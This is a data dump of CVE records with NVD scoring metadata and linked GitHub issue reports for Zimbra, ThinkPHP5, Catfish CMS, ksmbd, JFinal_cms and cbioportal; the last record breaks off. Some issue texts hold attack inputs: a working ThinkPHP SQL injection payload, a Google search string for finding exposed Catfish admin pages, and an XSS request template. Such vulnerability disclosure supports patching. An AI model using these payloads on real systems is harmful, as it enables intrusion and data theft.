| Reflected XSS via Host header injection on Zimbra | https://api.github.com/repos/buxu/bug/issues/2/comments | 0 | 2019-04-05T08:23:35Z | 2019-04-08T03:53:32Z | https://github.com/buxu/bug/issues/2 | 429,637,972 | 2 | 2,861 |
CVE-2020-18985 | 2021-12-15T23:15:08.740 | An issue in /domain/service/.ewell-known/caldav of Zimbra Collaboration 8.8.12 allows attackers to redirect users to any arbitrary website of their choosing. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/buxu/bug/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/buxu/bug/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.12:-:*:*:*:*:*:*",
"matchCriteriaId": "9B49E1CC-2362-4B1A-AED7-B8F857EB0D8C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"601"
] | 601 | https://github.com/buxu/bug/issues/3 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"buxu",
"bug"
] | Affected product: Zimbra Collaboration
Version testing: 8.8.12 (latest version)
Affected function: privated for fixing
OS: Centos7
| Open Redirect vulnerability on Zimbra | https://api.github.com/repos/buxu/bug/issues/3/comments | 0 | 2019-04-05T08:45:33Z | 2019-04-08T03:54:11Z | https://github.com/buxu/bug/issues/3 | 429,646,063 | 3 | 2,862 |
CVE-2021-44350 | 2021-12-15T23:15:08.810 | SQL Injection vulnerability exists in ThinkPHP5 5.0.x <=5.1.22 via the parseOrder function in Builder.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/top-think/framework/issues/2613"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/top-think/framework/issues/2613"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*",
"matchCriteriaId": "22602324-FAE5-4999-B781-8BE443979414",
"versionEndExcluding": null,
"versionEndIncluding": "5.1.22",
"versionStartExcluding": null,
"versionStartIncluding": "5.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/top-think/framework/issues/2613 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"top-think",
"framework"
] | This vulnerability exists in the parseOrder method of the Builder class. Because the program did not filter the data well, it directly spliced the data into SQL statements, which eventually led to SQL injection vulnerability. Version: 5.0.x<=ThinkPHP5<=5.1.22
As an example of 5.0.15, in fact, any version of the parseOrder () method that does not filter the passed parameters is available:
Add the following code to index.php

And then our payload looks like this:
?name[name^updatexml(1,concat(0x7,user(),0x7e),1)%23]=1
^ can also be replaced with -,%,/,&...
Let's analyze the formation of vulnerabilities:
In the Order method of the Query class, we can see that the data is stored directly in the $this->options['order'] 中。

Next, the find method of the Connection class calls the Select method of the Builder class to generate the SQL statement


The program directly concatenates the string through the parseKey method to return (, without any filtering, detection, which is also the cause of this SQL injection vulnerability
<img width="576" alt="ada15d0309c33e8935ec8dbda3a9ade" src="https://user-images.githubusercontent.com/67416400/143795266-158f303e-2ea6-4e41-91e0-147365c48fe1.png">
Finally, error injection is triggered:

| SQL injection vulnerability. Version: 5.0.x<=ThinkPHP5<=5.1.22 | https://api.github.com/repos/top-think/framework/issues/2613/comments | 0 | 2021-11-29T01:27:44Z | 2021-12-13T00:31:52Z | https://github.com/top-think/framework/issues/2613 | 1,065,512,666 | 2,613 | 2,863 |
CVE-2021-45017 | 2021-12-15T23:15:08.857 | Cross Site Request Forgery (CSRF) vulnerability exits in Catfish <=6.1.* when you upload an html file containing CSRF on the website that uses a google editor; you can specify the menu url address as your malicious url address in the Add Menu column. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xwlrbh/Catfish/issues/8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xwlrbh/Catfish/issues/8"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:catfish-cms:catfish_cms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3D55BDFE-7B82-4AEC-B2A1-CCE125EF99D3",
"versionEndExcluding": null,
"versionEndIncluding": "6.3.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"352"
] | 352 | https://github.com/xwlrbh/Catfish/issues/8 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"xwlrbh",
"Catfish"
] | [Suggested description]
Cross Site Request Forgery (CSRF) vulnerability exists incatfish - <=6.3.0. First, you upload an html file containing csrf on the website
that uses a google editor, (you only need to search in google:
inurl:catfishcms/index.php/admin/Index/addmenu.html and then use the authoity of this
When you have background permissions and want to induce other users to perform sensitive operations, you can specify the menu url address as your malicious url address in the Add Menu column
[Vulnerability Type]
Cross Site Request Forgery (CSRF)
[Vendor of Product]
https://github.com/xwlrbh/Catfish
[Affected Product Code Base]
catfish - <=6.3.0
[Affected Component]
To find a website that uses this editor, you only need to search in google: inurl:catfishcms/index.php/admin/Index/addmenu.html
Because this is the feature file of this editor
[Attack Type]
Remote
[Impact Code execution]
true
Attackers can use websites trusted by users to perform dangerous operations
[Attack Vectors]
<title>csrf test</title> // your target url



| There is a csrf vulnerability in catfish - <=6.3.0 | https://api.github.com/repos/xwlrbh/Catfish/issues/8/comments | 0 | 2021-12-12T03:23:30Z | 2021-12-12T03:23:30Z | https://github.com/xwlrbh/Catfish/issues/8 | 1,077,706,857 | 8 | 2,864 |
CVE-2021-45018 | 2021-12-15T23:15:08.897 | Cross Site Scripting (XSS) vulnerability exists in Catfish <=6.3.0 via a Google search in url:/catfishcms/index.php/admin/Index/addmenu.htmland then the .html file on the website that uses this editor (the file suffix is allowed). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xwlrbh/Catfish/issues/9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xwlrbh/Catfish/issues/9"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:catfish-cms:catfish_cms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3D55BDFE-7B82-4AEC-B2A1-CCE125EF99D3",
"versionEndExcluding": null,
"versionEndIncluding": "6.3.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/xwlrbh/Catfish/issues/9 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"xwlrbh",
"Catfish"
] | [Suggested description]
Cross SIte Scripting (XSS) vulnerability exists in catfish - <=6.3.0. via
a Google search inurl:/catfishcms/index.php/admin/Index/addmenu.htmland then the .html
file on the website that uses this editor (the file suffix is allowed).
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://github.com/xwlrbh/Catfish
[Affected Product Code Base]
catfish - <=6.3.0.
[Affected Component]
POST /catfishcms/index.php/admin/Index/addmenu.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
...
zidingyi=your xss url
[Attack Type]
Remote
[Impact Code execution]
true



| There is a stored xss vulnerability exists in catfish - <=6.3.0. | https://api.github.com/repos/xwlrbh/Catfish/issues/9/comments | 0 | 2021-12-12T03:28:22Z | 2021-12-12T03:28:22Z | https://github.com/xwlrbh/Catfish/issues/9 | 1,077,707,440 | 9 | 2,865 |
CVE-2021-45100 | 2021-12-16T05:15:08.827 | The ksmbd server through 3.4.2, as used in the Linux kernel through 5.15.8, sometimes communicates in cleartext even though encryption has been enabled. This occurs because it sets the SMB2_GLOBAL_CAP_ENCRYPTION flag when using the SMB 3.1.1 protocol, which is a violation of the SMB protocol specification. When Windows 10 detects this protocol violation, it disables encryption. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/cifsd-team/ksmbd/issues/550"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cifsd-team/ksmbd/pull/551"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://marc.info/?l=linux-kernel&m=163961726017023&w=2"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20220107-0001/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/cifsd-team/ksmbd/issues/550"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cifsd-team/ksmbd/pull/551"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://marc.info/?l=linux-kernel&m=163961726017023&w=2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20220107-0001/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ksmbd_project:ksmbd:*:*:*:*:*:*:*:*",
"matchCriteriaId": "390574D7-AB21-4856-8AA4-A5DFFEA207E0",
"versionEndExcluding": null,
"versionEndIncluding": "3.4.2",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8173A5D6-121D-4B12-9C0C-593FA8C29479",
"versionEndExcluding": null,
"versionEndIncluding": "5.15.8",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "234DEFE0-5CE5-4B0A-96B8-5D227CB8ED31",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDDF61B7-EC5C-467C-B710-B89F502CD04F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6770B6C3-732E-4E22-BF1C-2D2FD610061C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F9C8C20-42EB-4AB5-BD97-212DEB070C43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7FFF7106-ED78-49BA-9EC5-B889E3685D53",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E63D8B0F-006E-4801-BF9D-1C001BBFB4F9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "56409CEC-5A1E-4450-AA42-641E459CC2AF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B06F4839-D16A-4A61-9BB5-55B13F41E47F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "108A2215-50FB-4074-94CF-C130FA14566D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:h300e:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7AFC73CE-ABB9-42D3-9A71-3F5BC5381E0E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "32F0B6C0-F930-480D-962B-3F4EFDCC13C7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:h500e:-:*:*:*:*:*:*:*",
"matchCriteriaId": "803BC414-B250-4E3A-A478-A3881340D6B8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0FEB3337-BFDE-462A-908B-176F92053CEC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:h700e:-:*:*:*:*:*:*:*",
"matchCriteriaId": "736AEAE9-782B-4F71-9893-DED53367E102",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D0B4AD8A-F172-4558-AEC6-FF424BA2D912",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8497A4C9-8474-4A62-8331-3FE862ED4098",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
] | [
"319"
] | 319 | https://github.com/cifsd-team/ksmbd/issues/550 | [
"Third Party Advisory"
] | github.com | [
"cifsd-team",
"ksmbd"
] | Hello. I am facing an error with the latest stable v3.4.2 version, running on an OpenWRT machine. My configuration file is as follows:
```
[global]
netbios name = wd-casa
server string = Ksmbd on OpenWrt
workgroup = WORKGROUP
ipc timeout = 20
deadtime = 15
smb2 max read = 64K
smb2 max write = 64K
smb2 max trans = 64K
smb3 encryption = yes
restrict anonymous = 1
server signing = required
server min protocol = SMB3_11
######### Dynamic written config options #########
[marcos]
path = /mnt/data/marcos
force user = root
force group = root
create mask = 0666
directory mask = 0777
read only = no
guest ok = no
```
Despite "smb3 encryption" set to yes, communications are still being made in plain text according to Wireshark.
During the initial negotiation, both the client (a Windows 10 machine running 21H1, compilation 19043.1348) and the server agree on using 3.1.1 and AES-128-GCM:

On the the session setup request, however, the client decides to no longer flag it supports encryption, and thus request a plain text connection for unknown reasons:

Worse is, ksmbd agrees and goes on, ignoring the request to enforce encryption and just sending data on plain. The following screenshot displays a plain text ASCII message from opening a file which shouldn't be visible:

I am not sure if being made in plain text is an error on the Windows side or not, but at the very least ksmbd should probably deny connections if the user requested encryption in the settings.
Attached here is a .zip file with a Wireshark log of the entire packet exchange, from the initial connection to the desconnection: [comms.zip](https://github.com/cifsd-team/ksmbd/files/7715862/comms.zip) | Plaintext connection despite encryption enabled | https://api.github.com/repos/cifsd-team/ksmbd/issues/550/comments | 8 | 2021-12-15T01:44:51Z | 2021-12-16T13:08:55Z | https://github.com/cifsd-team/ksmbd/issues/550 | 1,080,469,469 | 550 | 2,866 |
CVE-2021-37262 | 2021-12-16T19:15:08.043 | JFinal_cms 5.1.0 is vulnerable to regex injection that may lead to Denial of Service. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/23"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/23"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"74"
] | 74 | https://github.com/jflyfox/jfinal_cms/issues/23 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"jflyfox",
"jfinal_cms"
] | I have tried to contact you by zcool321@sina.com and created https://github.com/jflyfox/jfinal_cms/issues/22 asking for the contact. Nobody replied.
The JFinal_cms is vulnerable to regex injection that may lead to Denial of Service.
User controlled `path` and `contextPath` are used to build and run a regex expression (first argument to replaceFirst):
https://github.com/jflyfox/jfinal_cms/blob/1a9653264be5a2fcf3641ae2aa5f14fc188fd192/src/main/java/com/jflyfox/modules/filemanager/FileManager.java#L929-L949
Since the attacker controls the string and the regex pattern he may cause a ReDoS by regex catastrophic backtracking on the server side.
| [SECURITY] Denial of service because of unsafe regex processing | https://api.github.com/repos/jflyfox/jfinal_cms/issues/23/comments | 3 | 2021-06-10T19:40:20Z | 2021-12-17T21:37:27Z | https://github.com/jflyfox/jfinal_cms/issues/23 | 917,802,283 | 23 | 2,867 |
CVE-2021-38244 | 2021-12-16T19:15:08.087 | A regular expression denial of service (ReDoS) vulnerability exits in cbioportal 3.6.21 and older via a POST request to /ProteinArraySignificanceTest.json. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cBioPortal/cbioportal/issues/8680"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cBioPortal/cbioportal/pull/8751"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cBioPortal/cbioportal/issues/8680"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
